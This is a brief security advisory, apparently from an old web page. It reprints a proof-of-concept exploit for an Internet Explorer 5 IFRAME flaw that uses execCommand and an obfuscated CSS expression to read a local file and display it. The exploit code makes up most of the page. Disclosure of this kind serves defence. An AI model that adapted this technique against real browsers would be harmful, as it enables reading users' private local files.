|
Microsoft IE5 IFRAME Vulnerability
Georgi Guninski has created a demonstration, available at: http://www.nat.bg/~joro/execcommand.html The code is as follows: <SCRIPT> alert("Create text file c:\\test.txt and it will be read"); function f() { I1.focus(); document.execCommand("selectAll"); document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'"); } setTimeout('f()',2000); </SCRIPT> <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME> |
|
|
Privacy Statement |
